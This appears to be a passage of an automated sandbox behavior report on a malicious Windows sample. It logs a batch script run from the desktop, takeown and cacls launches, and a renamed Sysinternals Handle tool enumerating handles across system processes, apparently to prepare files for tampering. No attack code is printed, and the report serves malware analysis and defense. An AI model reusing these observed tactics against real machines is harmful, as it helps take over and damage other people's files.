| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:06, Reason: Child Process |
| Unmonitor | End Time: 00:04:02, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:56 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x770 |
| Parent PID | 0xa70 (c:\users\ciihmnxmn6ps\desktop\mngrxc.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
7A8
0x
510
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000090000 | 0x00090000 | 0x000affff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000090000 | 0x00090000 | 0x0009ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x000a3fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000b0000 | 0x000b0000 | 0x000b1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000b0000 | 0x000b0000 | 0x000b3fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000000c0000 | 0x000c0000 | 0x000d3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000000e0000 | 0x000e0000 | 0x0011ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000120000 | 0x00120000 | 0x0021ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000220000 | 0x00220000 | 0x00223fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000230000 | 0x00230000 | 0x00230fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000240000 | 0x00240000 | 0x00241fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000250000 | 0x00250000 | 0x0028ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000290000 | 0x00290000 | 0x0029ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002d0000 | 0x002d0000 | 0x002dffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x002e0000 | 0x0039dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000003a0000 | 0x003a0000 | 0x003effff | Private Memory | rw |
|
|
|
- |
| cmd.exe | 0x003f0000 | 0x0043ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000440000 | 0x00440000 | 0x0443ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004440000 | 0x04440000 | 0x0469ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004440000 | 0x04440000 | 0x0453ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000045a0000 | 0x045a0000 | 0x0469ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x046a0000 | 0x049d6fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| cmdext.dll | 0x741b0000 | 0x741b7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f690000 | 0x7f690000 | 0x7f78ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f790000 | 0x7f790000 | 0x7f7b2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f7b6000 | 0x7f7b6000 | 0x7f7b6fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f7b9000 | 0x7f7b9000 | 0x7f7bbfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f7bc000 | 0x7f7bc000 | 0x7f7bcfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f7bd000 | 0x7f7bd000 | 0x7f7bffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (271)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
2 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
4 | |
| Get Info | "C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat" | type = file_attributes |
|
1 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
39 | |
| Get Info | - | type = file_type |
|
3 | |
| Get Info | - | type = file_type |
|
3 | |
| Get Info | qRY2vco2.exe | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
132 | |
| Open | STD_INPUT_HANDLE | - |
|
8 | |
| Open | - | - |
|
4 | |
| Open | - | - |
|
11 | |
| Open | - | - |
|
12 | |
| Read | - | size = 8191, size_out = 226 |
|
1 | |
| Read | - | size = 8191, size_out = 194 |
|
1 | |
| Read | - | size = 8191, size_out = 179 |
|
1 | |
| Read | - | size = 8191, size_out = 163 |
|
1 | |
| Read | - | size = 8191, size_out = 148 |
|
1 | |
| Read | - | size = 8191, size_out = 0 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 2 |
|
15 | |
| Write | STD_OUTPUT_HANDLE | size = 30 |
|
6 | |
| Write | STD_OUTPUT_HANDLE | size = 5 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 69 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 7 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 48 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 3 |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 18 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 37 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 32 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 56 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 1 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 12 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 38 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 44 |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 178, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (4)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\cacls.exe | os_pid = 0xae0, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | C:\Windows\system32\takeown.exe | os_pid = 0x95c, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | cmd.exe | - |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\qRY2vco2.exe | os_pid = 0x91c, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x3f0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x74f40000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x74f82780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x74f5fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x74f5a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x752a35c0 |
|
1 |
Environment (51)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
15 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
6 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
7 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Get Environment String | name = USERNAME, result_out = CIiHmnxMn6Ps |
|
1 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
5 | |
| Get Environment String | name = FN, result_out = "WinMail.exe" |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
2 | |
| Set Environment String | name = COPYCMD |
|
3 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
2 | |
| Set Environment String | name = =ExitCodeAscii |
|
3 | |
| Set Environment String | name = FN, value = "WinMail.exe" |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000001 |
|
1 |
Process #168: qry2vco264.exe
513
0
| Information | Value |
|---|---|
| ID | #168 |
| File Name | c:\users\ciihmn~1\appdata\local\temp\qry2vco264.exe |
| Command Line | qRY2vco2.exe -accepteula "Graph.jtp" -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:06, Reason: Child Process |
| Unmonitor | End Time: 00:03:22, Reason: Self Terminated |
| Monitor Duration | 00:00:16 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x950 |
| Parent PID | 0x594 (c:\users\ciihmnxmn6ps\desktop\qry2vco2.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
64C
0x
930
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00026fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00043fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x0014ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000150000 | 0x00150000 | 0x00153fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000160000 | 0x00160000 | 0x00160fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000170000 | 0x00170000 | 0x00171fff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x00180000 | 0x001b3fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000180000 | 0x00180000 | 0x00186fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000190000 | 0x00190000 | 0x00190fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001a0000 | 0x001a0000 | 0x001a0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x002bffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x002c0000 | 0x0037dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000380000 | 0x00380000 | 0x0047ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000480000 | 0x00480000 | 0x00607fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000610000 | 0x00610000 | 0x0073ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000610000 | 0x00610000 | 0x0071ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000730000 | 0x00730000 | 0x0073ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000740000 | 0x00740000 | 0x008c0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000008d0000 | 0x008d0000 | 0x01ccffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001cd0000 | 0x01cd0000 | 0x01ddffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f76d000 | 0x7f76d000 | 0x7f76dfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| qry2vco264.exe | 0x140000000 | 0x140045fff | Memory Mapped File | rwx |
|
|
|
|
| pagefile_0x00007ff5ffed0000 | 0x7ff5ffed0000 | 0x7ff5fffcffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00007ff5fffd0000 | 0x7ff5fffd0000 | 0x7ff5ffff2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00007ff5ffff9000 | 0x7ff5ffff9000 | 0x7ff5ffff9fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff5ffffb000 | 0x7ff5ffffb000 | 0x7ff5ffffcfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff5ffffd000 | 0x7ff5ffffd000 | 0x7ff5ffffefff | Private Memory | rw |
|
|
|
- |
| version.dll | 0x7ffc4b890000 | 0x7ffc4b899fff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x7ffc4fd60000 | 0x7ffc4fe09fff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x7ffc54580000 | 0x7ffc54592fff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x7ffc545a0000 | 0x7ffc545e9fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x7ffc54610000 | 0x7ffc5461efff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x7ffc54670000 | 0x7ffc54c97fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x7ffc54f80000 | 0x7ffc55032fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7ffc55040000 | 0x7ffc5521cfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7ffc55280000 | 0x7ffc552b5fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7ffc552c0000 | 0x7ffc5535cfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7ffc55380000 | 0x7ffc554dbfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x7ffc554e0000 | 0x7ffc5562dfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x7ffc55800000 | 0x7ffc558acfff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x7ffc559d0000 | 0x7ffc56ef4fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7ffc56f10000 | 0x7ffc57094fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7ffc570a0000 | 0x7ffc571c5fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x7ffc571d0000 | 0x7ffc5744bfff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x7ffc57460000 | 0x7ffc57537fff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7ffc57540000 | 0x7ffc5759afff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x7ffc578a0000 | 0x7ffc578f0fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x7ffc57aa0000 | 0x7ffc57b45fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | \\.\PROCEXP152 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
2 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 29 |
|
1 |
Registry (7)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Key | HKEY_CURRENT_USER\Software\Sysinternals\Handle | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Sysinternals | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Sysinternals | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Sysinternals\Handle | - |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Sysinternals | value_name = EulaAccepted, data = 0 |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Sysinternals\Handle | value_name = EulaAccepted, data = 1 |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Sysinternals\Handle | value_name = EulaAccepted, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 |
Process (127)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | c:\windows\syswow64\cacls.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\takeown.exe | desired_access = PROCESS_DUP_HANDLE |
|
3 | |
| Open | c:\windows\syswow64\takeown.exe | desired_access = PROCESS_DUP_HANDLE |
|
2 | |
| Open | c:\windows\syswow64\cacls.exe | desired_access = PROCESS_DUP_HANDLE |
|
5 | |
| Open | c:\windows\syswow64\cacls.exe | desired_access = PROCESS_DUP_HANDLE |
|
5 | |
| Open | c:\windows\syswow64\reg.exe | desired_access = PROCESS_DUP_HANDLE |
|
1 | |
| Open | c:\windows\system32\dllhost.exe | desired_access = PROCESS_DUP_HANDLE |
|
1 | |
| Open | c:\windows\system32\wbem\wmiadap.exe | desired_access = PROCESS_DUP_HANDLE |
|
1 | |
| Open | c:\windows\system32\sppsvc.exe | desired_access = PROCESS_DUP_HANDLE |
|
2 | |
| Open | c:\windows\systemapps\shellexperiencehost_cw5n1h2txyewy\shellexperiencehost.exe | desired_access = PROCESS_DUP_HANDLE |
|
1 | |
| Open | c:\windows\explorer.exe | desired_access = PROCESS_DUP_HANDLE |
|
1 | |
| Open | c:\windows\system32\sihost.exe | desired_access = PROCESS_DUP_HANDLE |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_DUP_HANDLE |
|
2 | |
| Open | c:\windows\system32\spoolsv.exe | desired_access = PROCESS_DUP_HANDLE |
|
1 | |
| Open | c:\windows\system32\dwm.exe | desired_access = PROCESS_DUP_HANDLE |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_DUP_HANDLE |
|
1 | |
| Open | c:\windows\system32\csrss.exe | desired_access = PROCESS_DUP_HANDLE |
|
1 | |
| Open | System | desired_access = PROCESS_DUP_HANDLE |
|
5 | |
| Open | System | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\smss.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\csrss.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\wininit.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\csrss.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\winlogon.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\services.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\lsass.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\dwm.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\spoolsv.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\common files\microsoft shared\clicktorun\officeclicktorun.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\sihost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\taskhostw.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\explorer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\runtimebroker.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\systemapps\shellexperiencehost_cw5n1h2txyewy\shellexperiencehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\systemapps\microsoft.windows.cortana_cw5n1h2txyewy\searchui.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\backgroundtaskhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windows multimedia platform\commands-xerox-relationship.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows mail\recorder.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\mozilla firefox\shift.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft office\unsubscribe-wisdom.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\msbuild\shoe-associations.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\adobe\israeli-runtime-recommendation.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windows media player\les lodging.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windows multimedia platform\normally.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows photo viewer\dir.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\google\baseball-showing-idaho.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\msbuild\returned.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows nt\sweden_decorative_wit.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\java\se-viii.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows multimedia platform\separate.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\reference assemblies\bulgaria.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows mail\advertisement-beginners.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\common files\semiconductorphysfisheries.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\mozilla firefox\medicare.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\google\spain-chart.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft office\females-ward.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\microsoft.net\beast.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\audiodg.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
